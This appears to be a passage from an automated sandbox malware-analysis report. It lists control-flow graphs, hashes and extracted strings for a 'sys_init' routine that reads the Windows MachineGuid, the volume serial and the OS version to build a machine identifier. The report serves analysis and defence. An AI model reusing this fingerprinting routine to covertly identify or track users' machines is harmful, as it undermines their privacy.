                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                    • API String ID: 3828489143-883582248
                                    • Opcode ID: ab038bee8234f97caf7f98465cb859aae6a65c5825cd4cb70bab40e8f46f15f3
                                    • Instruction ID: 98fa33b84cb37dc933a4c8883a39201de828f2e9f17d79c14e29ab87f1492e51
                                    • Opcode Fuzzy Hash: ab038bee8234f97caf7f98465cb859aae6a65c5825cd4cb70bab40e8f46f15f3
                                    • Instruction Fuzzy Hash: 86D14FA2F0C6D281FA228774EC543BC6361AF73B54F1D06F2C94D376A9DE2DA8458781

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 407 7ffb2273c25c-7ffb2273c276 call 7ffb2273bc64 410 7ffb2273c27c-7ffb2273c291 call 7ffb2273bbe3 407->410 411 7ffb2273c798 407->411 415 7ffb2273c293-7ffb2273c2c1 410->415 416 7ffb2273c2e7 410->416 414 7ffb2273c7ac-7ffb2273c7b1 411->414 417 7ffb2273c2f9-7ffb2273c310 call 7ffb2273c852 414->417 423 7ffb2273c2c3-7ffb2273c2c8 415->423 424 7ffb2273c2ca-7ffb2273c2e5 call 7ffb2273c852 415->424 418 7ffb2273c2ec-7ffb2273c2f7 FreeLibrary 416->418 422 7ffb2273c315-7ffb2273c322 417->422 418->417 421 7ffb2273c323-7ffb2273c35c GetNativeSystemInfo GetWindowsDirectoryA 418->421 425 7ffb2273c362-7ffb2273c383 GetLastError call 7ffb2273c852 421->425 426 7ffb2273c440-7ffb2273c463 call 7ffb2273c852 421->426 423->418 424->418 433 7ffb2273c385 425->433 434 7ffb2273c3a3-7ffb2273c3a9 425->434 426->417 435 7ffb2273c469-7ffb2273c49f call 7ffb22735192 426->435 436 7ffb2273c399-7ffb2273c39e 433->436 437 7ffb2273c387-7ffb2273c394 433->437 434->414 438 7ffb2273c3af-7ffb2273c3b5 434->438 445 7ffb2273c550-7ffb2273c56c call 7ffb2273c852 435->445 446 7ffb2273c4a5-7ffb2273c4a7 435->446 436->417 437->436 440 7ffb2273c3ee-7ffb2273c3f4 438->440 441 7ffb2273c3b7-7ffb2273c3ba 438->441 447 7ffb2273c7d4-7ffb2273c7d9 440->447 448 7ffb2273c3fa-7ffb2273c400 440->448 443 7ffb2273c3bc-7ffb2273c3bf 441->443 444 7ffb2273c3d8-7ffb2273c3de 441->444 452 7ffb2273c7b6-7ffb2273c7bb 443->452 453 7ffb2273c3c5-7ffb2273c3c8 443->453 455 7ffb2273c3e4-7ffb2273c3e9 444->455 456 7ffb2273c7ca-7ffb2273c7cf 444->456 459 7ffb2273c571 445->459 446->417 454 7ffb2273c4ad-7ffb2273c50a GetVolumeInformationA 446->454 447->417 449 7ffb2273c7de-7ffb2273c7e3 448->449 450 7ffb2273c406-7ffb2273c40c 448->450 449->417 457 7ffb2273c40e-7ffb2273c413 450->457 458 7ffb2273c418-7ffb2273c41d 450->458 452->417 460 7ffb2273c3ce-7ffb2273c3d3 453->460 461 7ffb2273c7c0-7ffb2273c7c5 453->461 462 7ffb2273c510-7ffb2273c536 GetLastError call 7ffb2273c852 454->462 463 7ffb2273c607-7ffb2273c639 call 7ffb2273c852 454->463 455->417 456->417 457->417 458->417 459->446 460->417 461->417 470 7ffb2273c576-7ffb2273c57c 462->470 471 7ffb2273c538 462->471 468 7ffb2273c64d-7ffb2273c654 463->468 469 7ffb2273c63b-7ffb2273c647 strlen 463->469 473 7ffb2273c658-7ffb2273c6b5 call 7ffb2273c852 468->473 469->468 472 7ffb2273c719-7ffb2273c71d 469->472 474 7ffb2273c582 470->474 475 7ffb2273c6d3-7ffb2273c6d8 470->475 476 7ffb2273c53e-7ffb2273c54b 471->476 477 7ffb2273c6bf-7ffb2273c6c4 471->477 472->468 478 7ffb2273c723-7ffb2273c727 472->478 483 7ffb2273c6ba 473->483 480 7ffb2273c5bb-7ffb2273c5c1 474->480 481 7ffb2273c584-7ffb2273c587 474->481 475->417 476->445 477->417 478->468 482 7ffb2273c72d-7ffb2273c760 _errno call 7ffb22744610 _errno 478->482 486 7ffb2273c6fb-7ffb2273c700 480->486 487 7ffb2273c5c7-7ffb2273c5cd 480->487 484 7ffb2273c5a5-7ffb2273c5ab 481->484 485 7ffb2273c589-7ffb2273c58c 481->485 500 7ffb2273c762-7ffb2273c765 482->500 501 7ffb2273c770-7ffb2273c793 _errno call 7ffb2273c852 482->501 483->422 491 7ffb2273c6f1-7ffb2273c6f6 484->491 492 7ffb2273c5b1-7ffb2273c5b6 484->492 489 7ffb2273c6dd-7ffb2273c6e2 485->489 490 7ffb2273c592-7ffb2273c595 485->490 486->417 493 7ffb2273c705-7ffb2273c70a 487->493 494 7ffb2273c5d3-7ffb2273c5d9 487->494 489->417 496 7ffb2273c59b-7ffb2273c5a0 490->496 497 7ffb2273c6e7-7ffb2273c6ec 490->497 491->417 492->417 493->417 498 7ffb2273c70f-7ffb2273c714 494->498 499 7ffb2273c5df-7ffb2273c5e4 494->499 496->417 497->417 498->417 499->417 500->473 502 7ffb2273c76b 500->502 501->468 502->468
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                    • API String ID: 3828489143-883582248
                                    • Opcode ID: 46ca43fdad5aebfdff8ff7f637804f566179bbe5369bf1760046e13ede7a569f
                                    • Instruction ID: 0f6de6d236f2df9fca73f5cbfa74ca46114d82ea1df0c1797422bde06819aef3
                                    • Opcode Fuzzy Hash: 46ca43fdad5aebfdff8ff7f637804f566179bbe5369bf1760046e13ede7a569f
                                    • Instruction Fuzzy Hash: 1FD16AE2F0C6D781FB229B75EC403B96260AB47B50F15103AC94ED72B0DEEDAD848742

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 505 7ffb227644cc-7ffb227644e6 call 7ffb22764df4 508 7ffb227644ec-7ffb22764501 call 7ffb22764d73 505->508 509 7ffb22764a08 505->509 513 7ffb22764557 508->513 514 7ffb22764503-7ffb22764531 508->514 512 7ffb22764a1c-7ffb22764a21 509->512 515 7ffb22764569-7ffb22764580 call 7ffb22769dc2 512->515 516 7ffb2276455c-7ffb22764567 FreeLibrary 513->516 521 7ffb2276453a-7ffb22764555 call 7ffb22769dc2 514->521 522 7ffb22764533-7ffb22764538 514->522 520 7ffb22764585-7ffb22764592 515->520 516->515 519 7ffb22764593-7ffb227645cc GetNativeSystemInfo GetWindowsDirectoryA 516->519 523 7ffb227646b0-7ffb227646d3 call 7ffb22769dc2 519->523 524 7ffb227645d2-7ffb227645f3 GetLastError call 7ffb22769dc2 519->524 521->516 522->516 523->515 533 7ffb227646d9-7ffb2276470f call 7ffb22763382 523->533 531 7ffb22764613-7ffb22764619 524->531 532 7ffb227645f5 524->532 531->512 536 7ffb2276461f-7ffb22764625 531->536 534 7ffb227645f7-7ffb22764604 532->534 535 7ffb22764609-7ffb2276460e 532->535 543 7ffb227647c0-7ffb227647dc call 7ffb22769dc2 533->543 544 7ffb22764715-7ffb22764717 533->544 534->535 535->515 538 7ffb2276465e-7ffb22764664 536->538 539 7ffb22764627-7ffb2276462a 536->539 545 7ffb2276466a-7ffb22764670 538->545 546 7ffb22764a44-7ffb22764a49 538->546 541 7ffb2276462c-7ffb2276462f 539->541 542 7ffb22764648-7ffb2276464e 539->542 550 7ffb22764a26-7ffb22764a2b 541->550 551 7ffb22764635-7ffb22764638 541->551 553 7ffb22764a3a-7ffb22764a3f 542->553 554 7ffb22764654-7ffb22764659 542->554 557 7ffb227647e1 543->557 544->515 552 7ffb2276471d-7ffb2276477a GetVolumeInformationA 544->552 547 7ffb22764a4e-7ffb22764a53 545->547 548 7ffb22764676-7ffb2276467c 545->548 546->515 547->515 555 7ffb2276467e-7ffb22764683 548->555 556 7ffb22764688-7ffb2276468d 548->556 550->515 558 7ffb22764a30-7ffb22764a35 551->558 559 7ffb2276463e-7ffb22764643 551->559 560 7ffb22764780-7ffb227647a6 GetLastError call 7ffb22769dc2 552->560 561 7ffb22764877-7ffb227648a9 call 7ffb22769dc2 552->561 553->515 554->515 555->515 556->515 557->544 558->515 559->515 568 7ffb227647a8 560->568 569 7ffb227647e6-7ffb227647ec 560->569 566 7ffb227648ab-7ffb227648b7 strlen 561->566 567 7ffb227648bd-7ffb227648c4 561->567 566->567 570 7ffb22764989-7ffb2276498d 566->570 571 7ffb227648c8-7ffb22764925 call 7ffb22769dc2 567->571 574 7ffb2276492f-7ffb22764934 568->574 575 7ffb227647ae-7ffb227647bb 568->575 572 7ffb227647f2 569->572 573 7ffb22764943-7ffb22764948 569->573 570->567 576 7ffb22764993-7ffb22764997 570->576 581 7ffb2276492a 571->581 578 7ffb2276482b-7ffb22764831 572->578 579 7ffb227647f4-7ffb227647f7 572->579 573->515 574->515 575->543 576->567 580 7ffb2276499d-7ffb227649d0 _errno call 7ffb22771098 _errno 576->580 584 7ffb2276496b-7ffb22764970 578->584 585 7ffb22764837-7ffb2276483d 578->585 582 7ffb227647f9-7ffb227647fc 579->582 583 7ffb22764815-7ffb2276481b 579->583 598 7ffb227649e0-7ffb22764a03 _errno call 7ffb22769dc2 580->598 599 7ffb227649d2-7ffb227649d5 580->599 581->520 587 7ffb22764802-7ffb22764805 582->587 588 7ffb2276494d-7ffb22764952 582->588 589 7ffb22764961-7ffb22764966 583->589 590 7ffb22764821-7ffb22764826 583->590 584->515 591 7ffb22764843-7ffb22764849 585->591 592 7ffb22764975-7ffb2276497a 585->592 594 7ffb2276480b-7ffb22764810 587->594 595 7ffb22764957-7ffb2276495c 587->595 588->515 589->515 590->515 596 7ffb2276497f-7ffb22764984 591->596 597 7ffb2276484f-7ffb22764854 591->597 592->515 594->515 595->515 596->515 597->515 598->567 599->571 600 7ffb227649db 599->600 600->567
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                    • API String ID: 3828489143-883582248
                                    • Opcode ID: 8496e7bb406785b1ac4194d1313cb78f70ffddb51f70b2bc06b7f1d5756571b6
                                    • Instruction ID: c380f77c63e8d704fad53303612589eb1f04815ffa7fedeb80aeb59e70c89a82
                                    • Opcode Fuzzy Hash: 8496e7bb406785b1ac4194d1313cb78f70ffddb51f70b2bc06b7f1d5756571b6
                                    • Instruction Fuzzy Hash: 1CD16DA1E0C6D3D1FB329B35ED603B822A0AB4B754F150036D94ED76B9DEACEC448785

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 701 7ffb23b06e0c-7ffb23b06e26 call 7ffb23b07734 704 7ffb23b07348 701->704 705 7ffb23b06e2c-7ffb23b06e41 call 7ffb23b076b3 701->705 708 7ffb23b0735c-7ffb23b07361 704->708 710 7ffb23b06e97 705->710 711 7ffb23b06e43-7ffb23b06e71 705->711 709 7ffb23b06ea9-7ffb23b06ec0 call 7ffb23b077a2 708->709 714 7ffb23b06ec5-7ffb23b06ed2 709->714 712 7ffb23b06e9c-7ffb23b06ea7 FreeLibrary 710->712 719 7ffb23b06e7a-7ffb23b06e95 call 7ffb23b077a2 711->719 720 7ffb23b06e73-7ffb23b06e78 711->720 712->709 716 7ffb23b06ed3-7ffb23b06f0c GetNativeSystemInfo GetWindowsDirectoryA 712->716 717 7ffb23b06f12-7ffb23b06f33 GetLastError call 7ffb23b077a2 716->717 718 7ffb23b06ff0-7ffb23b07013 call 7ffb23b077a2 716->718 727 7ffb23b06f35 717->727 728 7ffb23b06f53-7ffb23b06f59 717->728 718->709 729 7ffb23b07019-7ffb23b0704f call 7ffb23b0d3f2 718->729 719->712 720->712 730 7ffb23b06f49-7ffb23b06f4e 727->730 731 7ffb23b06f37-7ffb23b06f44 727->731 728->708 732 7ffb23b06f5f-7ffb23b06f65 728->732 741 7ffb23b07055-7ffb23b07057 729->741 742 7ffb23b07100-7ffb23b0711c call 7ffb23b077a2 729->742 730->709 731->730 734 7ffb23b06f67-7ffb23b06f6a 732->734 735 7ffb23b06f9e-7ffb23b06fa4 732->735 739 7ffb23b06f88-7ffb23b06f8e 734->739 740 7ffb23b06f6c-7ffb23b06f6f 734->740 737 7ffb23b06faa-7ffb23b06fb0 735->737 738 7ffb23b07384-7ffb23b07389 735->738 745 7ffb23b06fb6-7ffb23b06fbc 737->745 746 7ffb23b0738e-7ffb23b07393 737->746 738->709 743 7ffb23b0737a-7ffb23b0737f 739->743 744 7ffb23b06f94-7ffb23b06f99 739->744 748 7ffb23b07366-7ffb23b0736b 740->748 749 7ffb23b06f75-7ffb23b06f78 740->749 741->709 750 7ffb23b0705d-7ffb23b070ba GetVolumeInformationA 741->750 753 7ffb23b07121 742->753 743->709 744->709 751 7ffb23b06fc8-7ffb23b06fcd 745->751 752 7ffb23b06fbe-7ffb23b06fc3 745->752 746->709 748->709 754 7ffb23b07370-7ffb23b07375 749->754 755 7ffb23b06f7e-7ffb23b06f83 749->755 756 7ffb23b071b7-7ffb23b071e9 call 7ffb23b077a2 750->756 757 7ffb23b070c0-7ffb23b070e6 GetLastError call 7ffb23b077a2 750->757 751->709 752->709 753->741 754->709 755->709 764 7ffb23b071fd-7ffb23b07204 756->764 765 7ffb23b071eb-7ffb23b071f7 strlen 756->765 762 7ffb23b070e8 757->762 763 7ffb23b07126-7ffb23b0712c 757->763 766 7ffb23b0726f-7ffb23b07274 762->766 767 7ffb23b070ee-7ffb23b070fb 762->767 769 7ffb23b07283-7ffb23b07288 763->769 770 7ffb23b07132 763->770 771 7ffb23b07208-7ffb23b07265 call 7ffb23b077a2 764->771 765->764 768 7ffb23b072c9-7ffb23b072cd 765->768 766->709 767->742 768->764 772 7ffb23b072d3-7ffb23b072d7 768->772 769->709 773 7ffb23b07134-7ffb23b07137 770->773 774 7ffb23b0716b-7ffb23b07171 770->774 781 7ffb23b0726a 771->781 772->764 778 7ffb23b072dd-7ffb23b07310 _errno call 7ffb23b125d0 _errno 772->778 779 7ffb23b07139-7ffb23b0713c 773->779 780 7ffb23b07155-7ffb23b0715b 773->780 776 7ffb23b07177-7ffb23b0717d 774->776 777 7ffb23b072ab-7ffb23b072b0 774->777 782 7ffb23b072b5-7ffb23b072ba 776->782 783 7ffb23b07183-7ffb23b07189 776->783 777->709 794 7ffb23b07312-7ffb23b07315 778->794 795 7ffb23b07320-7ffb23b07343 _errno call 7ffb23b077a2 778->795 785 7ffb23b07142-7ffb23b07145 779->785 786 7ffb23b0728d-7ffb23b07292 779->786 787 7ffb23b072a1-7ffb23b072a6 780->787 788 7ffb23b07161-7ffb23b07166 780->788 781->714 782->709 789 7ffb23b072bf-7ffb23b072c4 783->789 790 7ffb23b0718f-7ffb23b07194 783->790 792 7ffb23b07297-7ffb23b0729c 785->792 793 7ffb23b0714b-7ffb23b07150 785->793 786->709 787->709 788->709 789->709 790->709 792->709 793->709 794->771 796 7ffb23b0731b 794->796 795->764 796->764
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                    • API String ID: 3828489143-883582248
                                    • Opcode ID: 1abb5038b05963b776529e4456fc73da6518fb59ef7b608b67d2e6a0660e025b
                                    • Instruction ID: deff1a18ad59c8b9543767c3585fbed7db0fe0bc3288fd7f1c018a3cf11f4247
                                    • Opcode Fuzzy Hash: 1abb5038b05963b776529e4456fc73da6518fb59ef7b608b67d2e6a0660e025b
                                    • Instruction Fuzzy Hash: FDD16DB9E1C6E681FB228F35EC893BCA250AF41754F1C01F6D9CD67A91DE2CE9458381

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 309 7ffb2270210c-7ffb22702126 call 7ffb22702a34 312 7ffb22702648 309->312 313 7ffb2270212c-7ffb22702141 call 7ffb227029b3 309->313 315 7ffb2270265c-7ffb22702661 312->315 318 7ffb22702197 313->318 319 7ffb22702143-7ffb22702171 313->319 317 7ffb227021a9-7ffb227021c0 call 7ffb227040d2 315->317 323 7ffb227021c5-7ffb227021d2 317->323 320 7ffb2270219c-7ffb227021a7 FreeLibrary 318->320 327 7ffb2270217a-7ffb22702195 call 7ffb227040d2 319->327 328 7ffb22702173-7ffb22702178 319->328 320->317 322 7ffb227021d3-7ffb2270220c GetNativeSystemInfo GetWindowsDirectoryA 320->322 325 7ffb22702212-7ffb22702233 GetLastError call 7ffb227040d2 322->325 326 7ffb227022f0-7ffb22702313 call 7ffb227040d2 322->326 335 7ffb22702235 325->335 336 7ffb22702253-7ffb22702259 325->336 326->317 337 7ffb22702319-7ffb2270234f call 7ffb22703402 326->337 327->320 328->320 338 7ffb22702249-7ffb2270224e 335->338 339 7ffb22702237-7ffb22702244 335->339 336->315 340 7ffb2270225f-7ffb22702265 336->340 349 7ffb22702355-7ffb22702357 337->349 350 7ffb22702400-7ffb2270241c call 7ffb227040d2 337->350 338->317 339->338 342 7ffb22702267-7ffb2270226a 340->342 343 7ffb2270229e-7ffb227022a4 340->343 347 7ffb22702288-7ffb2270228e 342->347 348 7ffb2270226c-7ffb2270226f 342->348 345 7ffb227022aa-7ffb227022b0 343->345 346 7ffb22702684-7ffb22702689 343->346 356 7ffb227022b6-7ffb227022bc 345->356 357 7ffb2270268e-7ffb22702693 345->357 346->317 354 7ffb2270267a-7ffb2270267f 347->354 355 7ffb22702294-7ffb22702299 347->355 351 7ffb22702666-7ffb2270266b 348->351 352 7ffb22702275-7ffb22702278 348->352 349->317 353 7ffb2270235d-7ffb227023ba GetVolumeInformationA 349->353 365 7ffb22702421 350->365 351->317 359 7ffb22702670-7ffb22702675 352->359 360 7ffb2270227e-7ffb22702283 352->360 361 7ffb227024b7-7ffb227024e9 call 7ffb227040d2 353->361 362 7ffb227023c0-7ffb227023e6 GetLastError call 7ffb227040d2 353->362 354->317 355->317 363 7ffb227022c8-7ffb227022cd 356->363 364 7ffb227022be-7ffb227022c3 356->364 357->317 359->317 360->317 372 7ffb227024fd-7ffb22702504 361->372 373 7ffb227024eb-7ffb227024f7 strlen 361->373 370 7ffb227023e8 362->370 371 7ffb22702426-7ffb2270242c 362->371 363->317 364->317 365->349 374 7ffb2270256f-7ffb22702574 370->374 375 7ffb227023ee-7ffb227023fb 370->375 377 7ffb22702583-7ffb22702588 371->377 378 7ffb22702432 371->378 379 7ffb22702508-7ffb22702565 call 7ffb227040d2 372->379 373->372 376 7ffb227025c9-7ffb227025cd 373->376 374->317 375->350 376->372 380 7ffb227025d3-7ffb227025d7 376->380 377->317 381 7ffb22702434-7ffb22702437 378->381 382 7ffb2270246b-7ffb22702471 378->382 389 7ffb2270256a 379->389 380->372 386 7ffb227025dd-7ffb22702610 _errno call 7ffb227129b8 _errno 380->386 387 7ffb22702439-7ffb2270243c 381->387 388 7ffb22702455-7ffb2270245b 381->388 384 7ffb22702477-7ffb2270247d 382->384 385 7ffb227025ab-7ffb227025b0 382->385 392 7ffb227025b5-7ffb227025ba 384->392 393 7ffb22702483-7ffb22702489 384->393 385->317 402 7ffb22702612-7ffb22702615 386->402 403 7ffb22702620-7ffb22702643 _errno call 7ffb227040d2 386->403 395 7ffb22702442-7ffb22702445 387->395 396 7ffb2270258d-7ffb22702592 387->396 390 7ffb227025a1-7ffb227025a6 388->390 391 7ffb22702461-7ffb22702466 388->391 389->323 390->317 391->317 392->317 397 7ffb227025bf-7ffb227025c4 393->397 398 7ffb2270248f-7ffb22702494 393->398 400 7ffb22702597-7ffb2270259c 395->400 401 7ffb2270244b-7ffb22702450 395->401 396->317 397->317 398->317 400->317 401->317 402->379 404 7ffb2270261b 402->404 403->372 404->372
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                    • API String ID: 3828489143-883582248
                                    • Opcode ID: 2d6eb3587d012150d0035a763db43da1dea75cf5edb20fa8ee07f934ba88f8ca
                                    • Instruction ID: b44231a014dd756dc90a1d80690417c90c3a1b65a4131f3fdb06f856d1611e6b
                                    • Opcode Fuzzy Hash: 2d6eb3587d012150d0035a763db43da1dea75cf5edb20fa8ee07f934ba88f8ca
                                    • Instruction Fuzzy Hash: 4BD16CE2E0C6D381FA668B74EC503B92260AF67750F150132D94DD76B4DEECEE888741

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 603 7ffb23ad348c-7ffb23ad34a6 call 7ffb23ad3db4 606 7ffb23ad39c8 603->606 607 7ffb23ad34ac-7ffb23ad34c1 call 7ffb23ad3d33 603->607 609 7ffb23ad39dc-7ffb23ad39e1 606->609 612 7ffb23ad3517 607->612 613 7ffb23ad34c3-7ffb23ad34f1 607->613 611 7ffb23ad3529-7ffb23ad3540 call 7ffb23ad1352 609->611 617 7ffb23ad3545-7ffb23ad3552 611->617 614 7ffb23ad351c-7ffb23ad3527 FreeLibrary 612->614 621 7ffb23ad34fa-7ffb23ad3515 call 7ffb23ad1352 613->621 622 7ffb23ad34f3-7ffb23ad34f8 613->622 614->611 616 7ffb23ad3553-7ffb23ad358c GetNativeSystemInfo GetWindowsDirectoryA 614->616 619 7ffb23ad3670-7ffb23ad3693 call 7ffb23ad1352 616->619 620 7ffb23ad3592-7ffb23ad35b3 GetLastError call 7ffb23ad1352 616->620 619->611 631 7ffb23ad3699-7ffb23ad36cf call 7ffb23adba62 619->631 629 7ffb23ad35d3-7ffb23ad35d9 620->629 630 7ffb23ad35b5 620->630 621->614 622->614 629->609 634 7ffb23ad35df-7ffb23ad35e5 629->634 632 7ffb23ad35b7-7ffb23ad35c4 630->632 633 7ffb23ad35c9-7ffb23ad35ce 630->633 641 7ffb23ad36d5-7ffb23ad36d7 631->641 642 7ffb23ad3780-7ffb23ad379c call 7ffb23ad1352 631->642 632->633 633->611 636 7ffb23ad35e7-7ffb23ad35ea 634->636 637 7ffb23ad361e-7ffb23ad3624 634->637 639 7ffb23ad3608-7ffb23ad360e 636->639 640 7ffb23ad35ec-7ffb23ad35ef 636->640 643 7ffb23ad362a-7ffb23ad3630 637->643 644 7ffb23ad3a04-7ffb23ad3a09 637->644 648 7ffb23ad39fa-7ffb23ad39ff 639->648 649 7ffb23ad3614-7ffb23ad3619 639->649 645 